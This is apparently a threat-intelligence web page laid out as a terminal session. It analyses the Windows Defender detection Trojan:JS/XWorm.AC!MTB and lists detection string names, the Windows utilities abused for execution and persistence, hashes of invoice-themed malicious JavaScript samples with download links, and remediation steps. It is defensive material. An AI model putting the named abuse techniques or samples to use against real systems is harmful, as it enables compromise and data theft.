user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:JS/XWorm.AC!MTB
Trojan:JS/XWorm.AC!MTB - Windows Defender threat signature analysis

Trojan:JS/XWorm.AC!MTB - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:JS/XWorm.AC!MTB
Classification:
Type:Trojan
Platform:JS
Family:XWorm
Detection Type:Concrete
Known malware family with identified signatures
Variant:AC
Specific signature variant within the malware family
Suffix:!MTB
Detected via machine learning and behavioral analysis
Detection Method:Behavioral
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for JavaScript platform, family XWorm

Summary:

This is a JavaScript-based XWorm Trojan that employs sophisticated techniques including API hooking, data encoding, and the abuse of legitimate Windows utilities (mshta, regsvr32, rundll32, PowerShell, BITS) for execution, persistence via scheduled tasks, and potential C2 communication. Its primary goal is likely system compromise, data theft, and further malicious activity, indicated by its concrete detection with low false positive risk.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: invoice-1645080830.pdf (68).js
f62d9c7f800ba268f5615d41c002bf8365986e6fca9ae1677219b2097446059b
29/12/2025
VirusTotalDownload Sample
Filename: invoice-1645080830.pdf (69).js
8da92fed7f92fb1ffcac455e0a5f3d543a763de17462138c121b60e0f689ae91
29/12/2025
VirusTotalDownload Sample
Filename: invoice-1645080830.pdf (67).js
635389a65f98ee0cc269c09a9a7f9e9cc9e7cb40bd09dbc4cd88edc6e2633e18
29/12/2025
VirusTotalDownload Sample
Filename: invoice-1645080830.pdf (63).js
c979471b42391b2d9564c39fd9eb3ad29922b341f065e269a4644065034eb5ff
29/12/2025
VirusTotalDownload Sample
Filename: invoice-1645080830.pdf (64).js
66c82affa993d16e42892f35c8fb5a0464641bf795090c2b4ca30057b43efc02
29/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected system from the network. Perform a full, deep scan with an updated antivirus solution and remove all detected components. Thoroughly investigate for persistence mechanisms (e.g., scheduled tasks, registry modifications) and signs of lateral movement, data exfiltration, or other post-exploitation activities. Ensure all systems are patched, enforce application control, and review user accounts for compromise.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 26/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$